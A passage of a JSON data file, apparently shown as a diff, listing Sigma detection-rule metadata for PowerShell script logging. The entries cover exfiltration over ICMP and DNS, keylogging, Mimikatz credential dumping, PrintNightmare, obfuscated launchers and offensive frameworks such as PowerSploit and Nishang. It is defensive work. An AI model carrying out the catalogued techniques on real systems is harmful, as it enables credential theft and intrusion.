HKLM\\SYSTEM\\CurrentControlSet\\Services\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/30", - "falsepositive": [ - "Legitimate administrative script" - ], - "filename": "posh_ps_get_acl_service.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.011" - ] - }, - "uuid": "95afc12e-3cbb-40c3-9340-84a032e596a3", - "value": "Service Registry Permissions Weakness Check" - }, - { - "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers within Active Directory.", - "meta": { - "author": "frack113", - "creation_date": "2022/03/17", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_get_adcomputer.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018" - ] - }, - "uuid": "36bed6b2-e9a0-4fff-beeb-413a92b86138", - "value": "Active Directory Computers Enumeration with Get-AdComputer" - }, - { - "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", - "meta": { - "author": "frack113", - "creation_date": "2022/03/17", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_get_adgroup.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adgroup.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.002" - ] - }, - "uuid": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", - "value": "Active Directory Group Enumeration With Get-AdGroup" - }, - { - "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/02/06", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_get_adreplaccount.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://www.powershellgallery.com/packages/DSInternals", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.006" - ] - }, - "uuid": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", - "value": "Suspicious Get-ADReplAccount" - }, - { - "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/13", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_get_childitem_bookmarks.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1217" - ] - }, - "uuid": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", - "value": "Automated Collection Bookmarks Using Get-ChildItem PowerShell" - }, - { - "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/21", - "falsepositive": [ - "Legitimate administration scripts" - ], - "filename": "posh_ps_hotfix_enum.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml" - ], - "tags": [ - "attack.discovery" - ] - }, - "uuid": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", - "value": "PowerShell Hotfix Enumeration" - }, - { - "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", - "meta": { - "author": "Bartlomiej Czyz @bczyz1, oscd.community", - "creation_date": "2020/10/10", - "falsepositive": [ - "Legitimate usage of System.Net.NetworkInformation.Ping class" - ], - "filename": "posh_ps_icmp_exfiltration.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ] - }, - "uuid": "4c4af3cd-2115-479c-8193-6b8bfce9001c", - "value": "PowerShell ICMP Exfiltration" - }, - { - "description": "Detects powershell scripts that import modules from suspicious directories", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/07", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_import_module_susp_dirs.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", - "value": "Import PowerShell Modules From Suspicious Directories" - }, - { - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", - "meta": { - "author": "frack113", - "creation_date": "2022/01/07", - "falsepositive": [ - "Legitimate script" - ], - "filename": "posh_ps_invoke_command_remote.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.006" - ] - }, - "uuid": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", - "value": "Execute Invoke-command on Remote Host" - }, - { - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", - "meta": { - "author": "frack113", - "creation_date": "2022/01/07", - "falsepositive": [ - "Legitimate script" - ], - "filename": "posh_ps_invoke_dnsexfiltration.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh", - "https://github.com/Arno0x/DNSExfiltrator", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048" - ] - }, - "uuid": "d59d7842-9a21-4bc6-ba98-64bfe0091355", - "value": "Powershell DNSExfiltration" - }, - { - "description": "Detects Commandlet name for PrintNightmare exploitation.", - "meta": { - "author": "Max Altgelt, Tobias Michalski", - "creation_date": "2021/08/09", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_nightmare.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/calebstewart/CVE-2021-1675", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_nightmare.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ] - }, - "uuid": "6d3f1399-a81c-4409-aff3-1ecfe9330baf", - "value": "PrintNightmare Powershell Exploitation" - }, - { - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_clip.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "73e67340-0d25-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell" - }, - { - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "meta": { - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", - "creation_date": "2019/11/08", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", - "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell" - }, - { - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_stdin.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "779c8c12-0eb1-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation STDIN+ Launcher - Powershell" - }, - { - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_var.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "0adfbc14-0ed1-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell" - }, - { - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_via_compress.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", - "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell" - }, - { - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_via_rundll.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", - "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell" - }, - { - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", - "value": "Invoke-Obfuscation Via Stdin - Powershell" - }, - { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", - "value": "Invoke-Obfuscation Via Use Clip - Powershell" - }, - { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/08", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "e55a5195-4724-480e-a77e-3ebe64bd3759", - "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell" - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2019/10/08", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", - "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell" - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_via_var.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "e54f5149-6ba3-49cf-b153-070d24679126", - "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell" - }, - { - "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", - "meta": { - "author": "frack113", - "creation_date": "2021/07/30", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_keylogging.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_keylogging.yml" - ], - "tags": [ - "attack.collection", - "attack.t1056.001" - ] - }, - "uuid": "34f90d3c-c297-49e9-b26d-911b05a4866c", - "value": "Powershell Keylogging" - }, - { - "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/28", - "falsepositive": [ - "Legitimate administrative script" - ], - "filename": "posh_ps_localuser.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_localuser.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", - "value": "Powershell LocalAccount Manipulation" - }, - { - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/26", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_mailboxexport_share.yml", - "level": "critical", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2481", - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" - ], - "tags": [ - "attack.exfiltration" - ] - }, - "uuid": "4a241dea-235b-4a7e-8d76-50d817b146c4", - "value": "Suspicious PowerShell Mailbox Export to Share - PS" - }, - { - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "meta": { - "author": "Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update), Nasreddine Bencherchali (update), Tim Shelton (fp), Mustafa Kaan Demir (update), Georg Lauenstein (update)", - "creation_date": "2017/03/05", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_malicious_commandlets.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", - "value": "Malicious PowerShell Commandlets" - }, - { - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "meta": { - "author": "Sean Metcalf (source), Florian Roth (rule)", - "creation_date": "2017/03/05", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_malicious_keywords.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "value": "Malicious PowerShell Keywords" - }, - { - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "meta": { - "author": "Max Altgelt", - "creation_date": "2021/09/21", - "falsepositive": [ - "Diagnostics" - ], - "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml" - ], - "tags": [ - "attack.t1003" - ] - }, - "uuid": "cd185561-4760-45d6-a63e-a51325112cae", - "value": "Live Memory Dump Using Powershell" - }, - { - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", - "meta": { - "author": "frack113", - "creation_date": "2022/08/19", - "falsepositive": [ - "Legitimate use" - ], - "filename": "posh_ps_modify_group_policy_settings.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" - ] - }, - "uuid": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", - "value": "Modify Group Policy Settings - ScriptBlockLogging" - }, - { - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", - "meta": { - "author": "frack113, MatilJ", - "creation_date": "2022/01/19", - "falsepositive": [ - "Legitimate administrative script" - ], - "filename": "posh_ps_msxml_com.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt", - "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", - "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "78aa1347-1517-4454-9982-b338d6df8343", - "value": "Powershell MsXml COM Object" - }, - { - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "meta": { - "author": "Alec Costello", - "creation_date": "2019/05/16", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_nishang_malicious_commandlets.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/samratashok/nishang", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", - "value": "Malicious Nishang PowerShell Commandlets" - }, - { - "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", - "meta": { - "author": "Sami Ruohonen", - "creation_date": "2018/07/24", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_ntfs_ads_access.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "http://www.powertheshell.com/ntfsstreams/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "8c521530-5169-495d-a199-0a3a881ad24e", - "value": "NTFS Alternate Data Stream" - }, - { - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/28", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_office_comobject_registerxll.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137.006" - ] - }, - "uuid": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "value": "Code Executed Via Office Add-in XLL File" - }, - { - "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/28", - "falsepositive": [ - "Mimikatz can be useful for testing the security of networks" - ], - "filename": "posh_ps_potential_invoke_mimikatz.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ] - }, - "uuid": "189e3b02-82b2-4b90-9662-411eb64486d4", - "value": "Potential Invoke-Mimikatz PowerShell Script" - }, - { - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/05/18", - "falsepositive": [ - "Should not be any as administrators do not use this tool" - ], - "filename": "posh_ps_powerview_malicious_commandlets.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://powersploit.readthedocs.io/en/stable/Recon/README", - "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", - "https://thedfirreport.com/2020/10/08/ryuks-return", - "https://adsecurity.org/?p=2277", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "dcd74b95-3f36-4ed9-9598-0490951643aa", - "value": "Malicious PowerView PowerShell Commandlets" - }, - { - "description": "Detects PowerShell calling a credential 